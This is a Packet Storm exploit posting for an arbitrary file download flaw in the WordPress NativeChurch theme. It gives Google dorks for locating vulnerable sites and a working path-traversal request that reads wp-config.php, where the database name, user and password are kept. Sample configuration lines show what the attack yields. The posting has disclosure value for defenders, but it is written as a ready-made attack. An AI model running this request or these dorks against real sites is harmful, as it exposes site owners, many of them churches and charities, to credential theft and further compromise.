exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress NativeChurch Multi-Purpose 5.0.x File Download

WordPress NativeChurch Multi-Purpose 5.0.x File Download
Posted Feb 25, 2019
Authored by KingSkrupellos

WordPress NativeChurch Multi-Purpose theme version 5.0.x suffers from a file download vulnerability.

tags | exploit, info disclosure
SHA-256 | d7b8e0584e3077f857027d82e29f12ca17ab213b299ab5b09211c133da31b75a

WordPress NativeChurch Multi-Purpose 5.0.x File Download

Change Mirror Download
####################################################################

# Exploit Title : WordPress NativeChurch Multi-Purpose Themes 5.0.x Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/02/2019
# Vendor Homepage : themeforest.net
# Software Information Link :
themeforest.net/item/nativechurch-multi-purpose-wordpress-theme/7082446
# Software Affected Versions : WordPress From 3.9 to 5.0.x
Compatible with Bootstrap 3.x - bbPress 2.5.x
From WooCommerce 2.1.x To WooCommerce 3.4.x,
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : [PDF]Sample PDF File inurl:"/wp-content/themes/NativeChurch/"
inurl:''inurl:/wp-content/themes/NativeChurch/download/''
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
NativeChurch is a powerful WordPress Theme designed & developed for Church,

Charity, Non-Profit and Religious Websites and comes handy

for Portfolio/Corporate Websites as well.

####################################################################

# Impact :
***********
* The NativeChurch theme for WordPress is prone to a vulnerability that lets attackers

download arbitrary files because the application fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to download arbitrary files within the context

of the web server process. Information obtained may aid in further attacks.

Attackers can use a browser to exploit this issue.

* The software uses external input to construct a pathname that should be within a

restricted directory, but it does not properly neutralize sequences

such as ".." that can resolve to a location that is outside of that directory.

####################################################################

# Arbitrary File Download Exploit :
******************************
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php

# Example Informations about MySQL WordPress Configuration File :
***********************************************************
/** Nom de la base de donnees de WordPress. */
define('DB_NAME',

/** Utilisateur de la base de donnees MySQL. */
define('DB_USER',

/** Mot de passe de la base de donnees MySQL. */
define('DB_PASSWORD',

/** Adresse de l'hebergement MySQL. */
define('DB_HOST',

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close